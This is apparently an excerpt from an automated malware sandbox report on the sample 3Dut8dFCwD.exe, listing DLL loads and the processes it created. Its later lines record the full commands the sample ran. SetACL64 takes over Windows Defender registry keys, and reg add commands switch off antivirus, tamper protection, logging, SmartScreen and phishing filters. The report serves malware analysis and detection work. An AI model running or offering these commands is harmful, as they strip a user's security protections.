Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Code function: 0_2_00405C40 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 0_2_00405C40 |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Code function: 0_2_00406891 FindFirstFileW,FindClose, | 0_2_00406891 |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Code function: 0_2_00402910 FindFirstFileW, | 0_2_00402910 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, | 4_2_00007FF69708C76C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 4_2_00007FF6970596D0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 4_2_00007FF69706CF15 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, | 5_2_00007FF69708C76C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 5_2_00007FF6970596D0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 5_2_00007FF69706CF15 |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat | Jump to behavior |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
